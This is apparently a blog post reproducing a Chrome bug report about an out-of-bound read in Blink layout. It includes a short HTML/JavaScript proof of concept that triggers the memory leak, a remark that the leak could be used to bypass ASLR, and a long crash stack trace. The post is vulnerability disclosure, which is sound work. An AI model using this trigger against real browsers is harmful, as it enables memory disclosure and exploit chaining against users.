Pageviews

Google Chrome: out-of-bound read in layout

Lets get this....

Steps to Reproduce :
 
Demo URL : http://hackies.in/testc.html 
#Bug: 695345

Code :
<style>
content { contain: size layout; }
</style>
<script>
function leak() {
 document.execCommand("selectAll");
 opt.text = "";
}
</script>
<body onload=leak()>
<content>
<select>
<option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>
</select>
</content>



Infoleak is demonstrated in the attached screenshot.





Since this is a layout bug AFAIK the leaked data can't be obtained via DOM calls, however it's possible to obtain it using tricks like unicode-range CSS descriptor (credits to Jann Horn for coming up with that approach) which is likely sufficient to turn this into an ASLR bypass.

However, it crashes in  M56 crashes before out-of-bound read.

Stack Trace for M56 :

------
Chromium    56.0.2924.76 (Developer Build) Built on Ubuntu , running on Ubuntu 16.04 (64-bit)
Revision    314da7cc1e56fc9fa9271bac2b029922feb4b6f2
OS    Linux
JavaScript    V8 5.6.326.42
------

Received signal 4 ILL_ILLOPN 7fffd94af6ef
#0 0x7ffff78b602e base::debug::StackTrace::StackTrace()
#1 0x7ffff78b6423 <unknown>
#2 0x7ffff7bcb390 <unknown>
#3 0x7fffd94af6ef blink::InlineTextBox::constructTextRun()
#4 0x7fffd94afb00 blink::InlineTextBox::localSelectionRect()
#5 0x7fffd9456dd4 blink::LayoutText::localSelectionRect()
#6 0x7fffd9458fb5 blink::LayoutText::localVisualRect()
#7 0x7fffd94811b9 blink::PaintInvalidationState::computeVisualRectInBacking()
#8 0x7fffd9422444 blink::LayoutObject::invalidatePaintIfNeeded()
#9 0x7fffd941fd94 blink::LayoutObject::invalidateTreeIfNeeded()
#10 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded()
#11 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded()
#12 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded()
#13 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded()
#14 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded()
#15 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded()
#16 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded()
#17 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded()
#18 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded()
#19 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded()
#20 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded()
#21 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded()
#22 0x7fffd90d48b4 blink::FrameView::invalidateTreeIfNeeded()
#23 0x7fffd90d4b7b blink::FrameView::invalidateTreeIfNeededRecursiveInternal()
#24 0x7fffd90d4c8c blink::FrameView::invalidateTreeIfNeededRecursive()
#25 0x7fffd90d7acc blink::FrameView::updateLifecyclePhasesInternal()
#26 0x7fffd956d24d blink::PageAnimator::updateAllLifecyclePhases()
#27 0x7fffe624c997 blink::WebViewImpl::updateAllLifecyclePhases()
#28 0x7fffefcd746b cc::ProxyMain::BeginMainFrame()
#29 0x7fffefcdda7d <unknown>
#30 0x7ffff78b7563 base::debug::TaskAnnotator::RunTask()
#31 0x7fffe6756f7f blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue()
#32 0x7fffe6757ae0 blink::scheduler::TaskQueueManager::DoWork()
#33 0x7ffff78b7563 base::debug::TaskAnnotator::RunTask()
#34 0x7ffff78dd760 base::MessageLoop::RunTask()
#35 0x7ffff78df35d base::MessageLoop::DeferOrRunPendingTask()
#36 0x7ffff78e01bd base::MessageLoop::DoWork()
#37 0x7ffff78e05a9 base::MessagePumpDefault::Run()
#38 0x7ffff78dcb42 base::MessageLoop::RunHandler()
#39 0x7ffff79054d8 base::RunLoop::Run()
#40 0x7ffff2516649 <unknown>
#41 0x7ffff2608068 <unknown>
#42 0x7ffff2608464 <unknown>
#43 0x7ffff26078e1 content::ContentMain()
#44 0x555555a6589c <unknown>
#45 0x7fffe26ff830 __libc_start_main
#46 0x555555a65769 <unknown>
  r8: 0000000000000000  r9: 0000000000000000 r10: 00000000000002d6 r11: 0000000000000009
 r12: 0000000000000040 r13: 00007fffffffc0a0 r14: 0000000000000000 r15: 000025b111450000
  di: 0000000000000060  si: 000025b111450000  bp: 00007fffffffc0a0  bx: 000032d41e005f30
  dx: 000004d2e4ccc680  ax: 0000000000000001  cx: 0000000000000000  sp: 00007fffffffbfa0
  ip: 00007fffd94af6ef efl: 0000000000010283 cgf: 0000000000000033 erf: 0000000000000000
 trp: 0000000000000006 msk: 0000000000000000 cr2: 0000000000000000
[end of stack trace]
[Thread 0x7fffc8d87700 (LWP 4925) exited]

Bug Reported by : Dhiraj Mishra 
Upstream Bug : Project Zero Google

No comments:

Post a Comment